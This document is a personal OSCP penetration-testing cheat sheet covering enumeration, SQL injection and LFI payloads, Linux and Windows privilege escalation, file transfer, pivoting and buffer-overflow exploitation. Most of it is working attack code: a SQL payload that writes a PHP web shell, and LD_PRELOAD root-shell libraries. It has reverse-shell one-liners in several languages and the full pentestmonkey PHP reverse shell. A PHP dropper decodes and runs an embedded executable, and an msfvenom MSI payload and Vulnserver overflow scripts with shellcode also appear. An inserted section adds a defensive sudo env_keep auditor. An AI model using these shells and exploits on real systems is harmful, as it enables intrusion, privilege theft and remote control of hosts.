OSCP Notes
by Harish G
Link_Matters
Enumeration
Port Scanning :
Optional: -sT (performs a full TCP connect scan instead of a SYN scan, to avoid getting flagged by firewalls)
To map the Apache version to the Ubuntu release -> search for "ubuntu httpd versions"
anonymous login check
ftp <ip address>
username : anonymous
password : anonymous
file upload -> put shell.php
id_rsa : private key used for SSH login. It may ask for a passphrase, which can be cracked with ssh2john and john.
id_rsa
ssh -i id_rsa user@10.10.10.x
For passwordless login, add id_rsa.pub to target's authorized_keys
ssh2john
If port 53 is open
Add host to /etc/hosts
dig axfr smasher.htb @10.10.10.135
https://ghostphisher.github.io/smasher2
Add the extracted domain to /etc/hosts and dig again
RPC (135)
rpcdump.py 10.11.1.121 -p 135 | grep ncacn_np    # get pipe names

rpcmap.py ncacn_ip_tcp:10.11.1.121[135]
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
SMB Exploits :
SNMP (161)
IRC (194,6667,6660-7000)
NFS (2049)
showmount -e 10.1.1.27
mkdir /mnt/nfs
mount -t nfs 192.168.2.4:/nfspath-shown /mnt/nfs
Permission Denied ? (https://blog.christophetd.fr/write-up-vulnix/)
MYSQL (3306)
Redis (6379)
In the output of config get * you can find the home directory of the redis user (usually /var/lib/redis or /home/redis/.ssh); knowing this, you know where you can write an authorized_keys file to access the box via SSH as the redis user. If you know the home of another valid user where you have write permission, you can abuse it the same way:
3. Import the file into redis : cat foo.txt | redis-cli -h 10.10.10.10 -x set crackit
4. Save the public key to the authorized_keys file on redis server:
Port Knocking :
# TCP
knock -v 192.168.0.116 4 27391 159

# UDP
knock -v 192.168.0.116 4 27391 159 -u

# TCP & UDP
knock -v 192.168.1.111 159:udp 27391:tcp 4:udp
Misc :
Run autorecon
https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/enumeration
IF NOTHING WORKS
Bruteforce
Directory Bruteforce
Cewl :
Hashcat :
https://hashcat.net/wiki/doku.php?id=example_hashes    (to pick the -m hash-mode parameter)
John :
Online tools :
https://crackstation.net/
LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256,
sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)),
QubesV3.1BackupDefaults
https://www.dcode.fr/tools-list
MD4, MD5, RC4 Cipher, RSA Cipher, SHA-1, SHA-256, SHA-512, XOR Cipher
https://www.md5online.org/md5-decrypt.html (MD5)
https://md5.gromweb.com/ (MD5)
Protocols Bruteforce
Hydra
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc,
RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ,
SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP,
Subversion/SVN, Firebird, LDAP2, Cisco AAA
Medusa
AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3,
PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2,
Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic
Wrapper, Web Form
Ncrack (Fastest)
SSH
Wordlist
SMB :
HTTP Post
80, 443
Checklist
IIS :
https://book.hacktricks.xyz/pentesting/pentesting-web/iis-internet-information-services
Try requesting file.asp as file.asp.txt to reveal the source code of the file
Apache :
Struts (https://github.com/LightC0der/Apache-Struts-0Day-Exploit)
Shell shock (https://www.exploit-db.com/exploits/34900)
OpenFuck (https://github.com/exploit-inters/OpenFuck)
Directory Enumeration
Parameter Fuzzing
WFUZZ
Wordpress
Wpscan
Metasploit
use auxiliary/scanner/http/wordpress_login_enum
SecurityCompass/wordpress-scripts : https://github.com/SecurityCompass/wordpress-scripts/blob/master/wp_login_user_enumeration.py
SQL Injection
Payloads
'
)'
"
`
')
")
`)
'))
"))
`))
'-SLEEP(30); #
Login Bypass
order by 1
' UNION SELECT 1,2,3 -- -
' UNION SELECT 1,@@version,3 -- -
' UNION SELECT 1,user(),3 -- -
' UNION SELECT 1,load_file('/etc/passwd'),3 -- -
' UNION SELECT 1,load_file(0x2f6574632f706173737764),3 -- -    // hex encoded
' UNION SELECT 1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3 -- -    // char encoded

// List databases available
' UNION SELECT 1,2,3,4,5,group_concat(table_schema) from information_schema

// Fetch table names
' UNION SELECT 1,group_concat(table_name),3 from information_schema.tables
union all select 1,2,3,4,table_name,6 FROM information_schema.tables

// Fetch column names from a table
' UNION SELECT 1,group_concat(column_name),3 from information_schema.column
union all select 1,2,3,4,column_name,6 FROM information_schema.columns wher

// Dump data from columns using 0x3a (':') as separator
' UNION SELECT 1,group_concat(user,0x3a,password),3 from users limit 0,1-- -

// Backdoor
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OU
MSSQL
File Upload
HTTP PUT
Cadaver
cadaver http://192.168.1.103/dav/
put /tmp/shell.php

# POST file
curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php

# POST binary data to web form
curl -F "field=<shell.zip" http://$TARGET/upld.php -F 'k=v' --cookie "k=v;"
curl -F "field=<shell.zip" http://$TARGET/upld.php -F 'k=v' --cookie "k=v;" -F "submit=true" -L -v
LFI
Files
/etc/passwd
/etc/shadow
/etc/knockd.conf    # port knocking config
wfuzz -c -w /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
Basic LFI
http://url/index.php?page=../../../etc/passwd
http://url/index.php?page=../../../etc/shadow
http://url/index.php?page=../../../home/user/.ssh/id_rsa.pub
http://url/index.php?page=../../../home/user/.ssh/id_rsa
http://url/index.php?page=../../../home/user/.ssh/authorized_keys
http://url/index.php?page=../../../etc/passwd%00
php://filter
http://url/index.php?page=php://filter/convert.base64-encode/resource=index
http://url/index.php?page=pHp://FilTer/convert.base64-encode/resource=index
input://
http://url/index.php?page=php://input
POST DATA: <?php system('id'); ?>
Linux Privilege Escalation
OS & User Enumeration :
##################################### Cron tabs ###########################

ls -lah /etc/cron*
cat /etc/crontab
ls -la /var/log/cron*                  # Locating cron logs
find / -name cronlog 2>/dev/null
grep "CRON" /var/log/cron.log          # for locating running jobs from logs
grep CRON /var/log/syslog              # grepping cron from syslog


#################################### Internal Ports #######################

netstat -alnp | grep LIST | grep port_num
netstat -antp
netstat -tulnp
# curl the listening ports

################################### Interesting DIRS ######################
/
/dev
/scripts
/opt
/mnt
/var/www/html
/var
/etc
/media
/backup

################################### SUID Binaries #########################

(https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binar

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
ldd /usr/bin/binary-name
strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file

################################# Firewall Enumeration ####################

grep -Hs iptables /etc/*

############################### Kernel Modules ############################

lsmod
/sbin/modinfo <mod name>
PrivEsc Checklist :
Find a shared object that the SUID binary looks for in a path where you have write access
Create a shared object with the missing .so file name
Run the SUID binary
NFS Misconfiguration :
cat /etc/exports
On Kali
mkdir /tmp/nfs
On Target
/tmp/shell.elf
Kernel Exploits
cat /proc/version
uname -r
uname -mrs
cat /etc/lsb-release
cat /etc/os-release
sudo chown root exploit
$ ls -l exploit
-rwsr-xr-x 1 root users 6894 11 sept. 22:05 exploit
#include <unistd.h>

int main()
{
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}
./exploit
# whoami
root
Tools :
Resources :
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
https://github.com/Ignitetechnologies/Privilege-Escalation
https://gtfobins.github.io/
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Mysql
MYSQL UDF Exploit: https://www.exploit-db.com/exploits/1518
mysql -u root

select sys_exec('whoami');
select sys_eval('whoami');

/* If the function doesn't exist, create it */
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';

/* If NULL is returned, try redirecting stderr into the output */
select sys_eval('ls /root 2>&1');
Sudo Abuse
$ sudo -l
[sudo] password for appadmin:
User appadmin may run the following commands on this host:
    (root) /opt/Support/start.sh
Checklist
Environment Variables
(https://tryhackme.com/room/linuxprivesc)
Check which environment variables are inherited (look for the env_keep options):
sudo -l
LD_PRELOAD
LD_PRELOAD lists libraries (shared objects) that the loader will load before any other shared library, including the C runtime library.
/* Preload.c */

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setresuid */

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
Run one of the programs you are allowed to run via sudo (listed when running sudo -l), while setting the LD_PRELOAD environment variable to the full path of the new shared object:
LD_LIBRARY_PATH
LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.
Run ldd against any program that you can execute with sudo (sudo -l) to see which shared libraries are used by the program:
ldd /usr/sbin/apache2
Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using
the code located at /home/user/tools/sudo/library_path.c:
/* Library_path.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setresuid */

static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
gcc -o /tmp/libcrypt.so.1 -shared -fPIC library_path.c
Run the program using sudo, while setting the LD_LIBRARY_PATH environment variable to /tmp (where we output the compiled shared object):
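The check a defender wants here, added by the editor and not part of these notes: parse the output of sudo -l and report any env_keep entry that hands LD_PRELOAD or LD_LIBRARY_PATH to a sudo-able command, which is the condition both tricks above rely on. The sample output, hostnames, commands and function names below are constructed.

```python
import re

# Loader variables that the two tricks above rely on: if sudo keeps them in
# the environment, the caller decides which shared object gets mapped into
# the privileged process.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH"}

# Constructed sample of `sudo -l` output (hostname and commands are made up).
SAMPLE_RISKY = """\
Matching Defaults entries for user on host1:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH,
    mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin

User user may run the following commands on host1:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) /usr/sbin/apache2
"""

# Constructed sample of a host whose Defaults keep nothing loader-related.
SAMPLE_SAFE = """\
Matching Defaults entries for user on host2:
    env_reset, mail_badpass, env_keep+="EDITOR LANG"

User user may run the following commands on host2:
    (root) /usr/bin/systemctl restart apache2
"""

# env_keep+=VAR, env_keep-=VAR, env_keep=VAR or env_keep+="VAR1 VAR2"
_ENV_KEEP = re.compile(r'env_keep\s*([+-]?=)\s*("[^"]*"|[^,\s]+)')
# (runas) [NOPASSWD:] command
_COMMAND = re.compile(r'^\s*\(([^)]*)\)\s*(?:NOPASSWD:\s*)?(.+?)\s*$', re.M)


def parse_env_keep(sudo_l_output):
    """Return the variable names kept by env_keep in the 'Matching Defaults
    entries' block, applying +=, -= and = in the order sudo prints them."""
    kept = []
    in_defaults = False
    for line in sudo_l_output.splitlines():
        if line.startswith("Matching Defaults entries"):
            in_defaults = True
            continue
        if in_defaults and not line.strip():
            break  # a blank line ends the Defaults block
        if not in_defaults:
            continue
        for op, value in _ENV_KEEP.findall(line):
            names = value.strip('"').split()
            if op == "=":
                kept = names
            elif op == "-=":
                kept = [n for n in kept if n not in names]
            else:
                kept.extend(names)
    return kept


def parse_commands(sudo_l_output):
    """Return (runas, command) pairs from the 'may run the following commands' block."""
    return [(runas.strip(), cmd) for runas, cmd in _COMMAND.findall(sudo_l_output)]


def audit(sudo_l_output):
    """Return one (variable, runas, command) finding per kept loader variable and
    per command it could be injected into; an empty list means nothing to fix."""
    kept = sorted(set(parse_env_keep(sudo_l_output)) & LOADER_VARS)
    return [(var, runas, cmd) for var in kept for runas, cmd in parse_commands(sudo_l_output)]


if __name__ == "__main__":
    for sample in (SAMPLE_RISKY, SAMPLE_SAFE):
        findings = audit(sample)
        if not findings:
            print("ok: no loader variables kept by env_keep")
        for var, runas, cmd in findings:
            print(f"FIX: env_keep passes {var} into '{cmd}' (runs as {runas}); "
                  f"remove it with: Defaults env_keep -= \"{var}\"")
```

On a real host feed it the captured text of sudo -l; the fix it prints is the sudoers line that removes the variable from env_keep.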
Escalation Methods
Windows Privilege Escalation
Enumeration
OS Info Enumeration
systeminfo
hostname
echo %username%
User Enumeration
whoami
net localgroup <group name> -> List the members of the given localgroup
tasklist /SVC
tasklist
net start
DRIVERQUERY
Permission Enumeration
C:\Program Files : icacls program_name
icacls root.txt /grant <username>:F (to grant permission to access file)
Check the PowerShell history file
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Network based
ipconfig
ipconfig /all
arp -a
route print
netstat -ano
Password Hunting
sc query windefend
netsh advfirewall firewall dump
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
netsh firewall show state      (show whether the firewall is running or stopped)
netsh firewall show config     (show firewall configuration)

netsh firewall set opmode disable    # Disable firewall
Scheduled Tasks
Mount Information
mountvol
Escalation Techniques
whoami /priv
Run As :
cmdkey /list
Currently stored credentials:
    Target: Domain:interactive=WORKGROUP\Administrator
    Type: Domain Password
    User: WORKGROUP\Administrator
Access check :
Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
Powershell :
Binary planting
(https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services)
sc qc [service_name] // for service properties
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f msi > i

C:> msiexec /quiet /qn /i install.msi
Kernel Exploits :
https://github.com/abatchy17/WindowsExploits
https://github.com/SecWiki/windows-kernel-exploits
run systeminfo | capture the output and run windows-exploit-suggester.py
Compiling Kernel Exploits :
or for 32 bit
Powershell:
EXE : (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#exe)
WinPeas [ https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS ]
Accesschk.exe [ https://github.com/jivoi/pentest/blob/master/post_win/accesschk_exe ]
PowerUp (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
Seatbelt (https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)
Metasploit :
getsystem
Resources :
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
http://www.fuzzysecurity.com/tutorials/16.html
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation (Windows PrivEsc Checklist)
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
Linux Reverse Shells
Awk
Bash
exec 5<>/dev/tcp/LHOST/LPORT && while read line 0<&5; do $line 2>&5 >&5; done
Java
Javascript
(function(){ var net = require("net"), cp = require("child_process"), sh = c
Netcat
Perl
# Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"LHOST:LPORT");STDIN->fdopen
PHP
<?php system($_GET['cmd']);?>

<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
Powershell
Python
# TCP
python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_

# SCTP
python -c "import os,pty,socket,sctp;s=sctp.sctpsocket_tcp(socket.AF_INET)

# UDP
python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_
Ruby
# Windows
ruby -rsocket -e 'c=TCPSocket.new("LHOST","LPORT");while(cmd=c.gets);IO.pop
Socat
TCLsh
Telnet
xterm
# Make sure the Xserver is listening to TCP.
xhost +RHOST
xterm -display LHOST:0    or    DISPLAY=LHOST:0 xterm
Listeners
Restricted Shell / SSH
If the reverse shell is not working, test which characters the restricted shell lets through:
echo abc
echo abc/
echo abc -
Check env variables -> env
HOME=/
echo ${HOME}/home
Optional (use octal escapes to get blocked characters past the filter):
printf "\55" -> -
SSH :
# Ways to start a shell with no profile
ssh hostname -t "bash --noprofile"
ssh -t user@host bash --norc --noprofile
ssh -t username@hostname /bin/sh
ssh -t user@host "bash --norc --noprofile -c '/bin/rm .bashrc'"

# SSH bash shellshock (Troll2 Vulnhub)
ssh -i noob noob@192.168.0.119 '() { :; }; uname -a'

export PATH=/bin/:/sbin/:/usr/bin/:$PATH
payload = "python -c 'import pty;pty.spawn(\"/bin/bash\")'"
Stable Reverse Shells
PHP
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsi
// for any actions performed using this tool. The author accepts no liabil
// for damage caused by this tool. If these terms are not acceptable to yo
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsi
// for any actions performed using this tool. If these terms are not accep
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and p
// The recipient will be given a shell running as the current user (apache
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will
// Some compile-time options are needed for daemonisation (like pcntl, posi
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fata
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read fr
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write
    2 => array("pipe", "w")   // stderr is a pipe that the child will write
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>
Python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.110",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Spawn TTY
Bash
/bin/bash -i
echo os.system('/bin/bash')
/bin/sh -i
Python
Perl
Socat
On the attacker machine, set up a socat listener; replace 4444 with your listening port.
On the victim machine, connect back to the attacker machine and spawn a shell. Replace <host> with the attacker IP and <port> with the attacker's listening port.
Misc
Interactive TTY
user@remote:~$ ^Z
user@local:~$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /
Ignoring hotkeys in the local shell and getting back to the remote:
Setting the correct size for the remote shell (where ROWS and COLS are the values from the 3rd bullet):
user@remote:~$ export TERM=xterm-256color
Windows Reverse Shells
PHP :
<?php

header('Content-type: text/plain');
$ip = "192.168.1.9";   // change this
$port = "1234";        // change this
$payload = "7Vh5VFPntj9JDklIQgaZogY5aBSsiExVRNCEWQlCGQQVSQIJGMmAyQlDtRIaQGK
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir = "C:\\windows\\temp";
chdir($tmpdir);
$res = "Using dir : ".$tmpdir;
$filename = "D3fa1t_shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = system($cmd);

?>
Windows Python :
Powershell :
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.
Certutil :
Metasploit :
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109 //your LH
msf exploit(windows/smb/smb_delivery) > exploit

rundll32.exe \\192.168.1.109\vabFG\test.dll,0
Credits : Hacking Articles
Resources :
https://book.hacktricks.xyz/shells/shells/windows
https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
File Transfers
Set up FTP :
HTTP :
python -m SimpleHTTPServer
python3 -m http.server
updog (https://github.com/sc0tfree/updog)
Linux :
curl
wget
Netcat
# Receiver
nc 192.168.0.1 4444 > file

# Sender
cat file | nc -nlvp 4444          # Normal file

# Base64 encoded sender
cat binary | base64 | nc -nlvp 4444
Windows :
certutil -urlcache -f http://<ip>/uri output.ext
//10.10.10.x/smb
Cryptography
HTB Machines :
HTB Obscurity
HTB Frolic - Multiple Encodings and Ciphers
Common Ciphers :
Cipher Identifier :
https://www.boxentriq.com/code-breaking/cipher-identifier
https://gchq.github.io/CyberChef/
https://www.devglan.com/online-tools/aes-encryption-decryption (AES)
Hash-Identifier (Kali)
hashid
Pivot
Chisel :
Burp -> user options -> socks proxy -> use socks proxy
vi /etc/proxychains.conf
Change socks4(metasploit) to socks5(ssh)
proxychains curl -k https://10.10.10.60    (-k skips TLS certificate verification)
Buffer Overflows
Steps :
1. Fuzzing
2. Finding the Offset
3. Overwriting the EIP
4. Finding Bad Characters
5. Finding the JMP ESP address
6. Exploiting the System
1. Fuzzing
#!/usr/bin/python
# -*- coding: utf-8 -*-

import sys, socket

buffer = "\x41" * 3000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.0.71', 9999))
s.send('TRUN /.:/' + buffer)
s.recv(1024)
s.close()
Cmd :
msf-pattern_create -l 3000
msf-pattern_offset -q 386F4337
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import socket

offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.0.71', 9999))
    s.send('TRUN /.:/' + offset)
    s.close()
except:
    print('Error connecting to server')
    sys.exit()
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import socket

shellcode = 'A' * 2003 + 'B' * 4

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.0.71', 9999))
    s.send('TRUN /.:/' + shellcode)
    s.close()
except:
    print('Error connecting to server')
    sys.exit()
badchars = (
    "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
#!/usr/bin/python
import sys, socket

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\x
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\x
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\x

shellcode = "A" * 2003 + "B" * 4 + badchars

try:
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(('10.0.0.71',9999))
    s.send('TRUN /.:/' + shellcode)
    s.close()

except:
    print("Error connecting to server")
    sys.exit()
!mona jmp -r esp
Alternate Way :
!mona modules
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import socket

shellcode = 'A' * 2003 + "\xaf\x11\x50\x62"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.0.71', 9999))
    s.send('TRUN /.:/' + shellcode)
    s.close()
except:
    print('Error connecting to server')
    sys.exit()
6. Exploit
#!/usr/bin/python
# -*- coding: utf-8 -*-

import sys
import socket

overflow = (
    "\xb8\x0c\x65\xe6\x11\xda\xd9\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
    "\x52\x31\x42\x12\x83\xea\xfc\x03\x4e\x6b\x04\xe4\xb2\x9b\x4a"
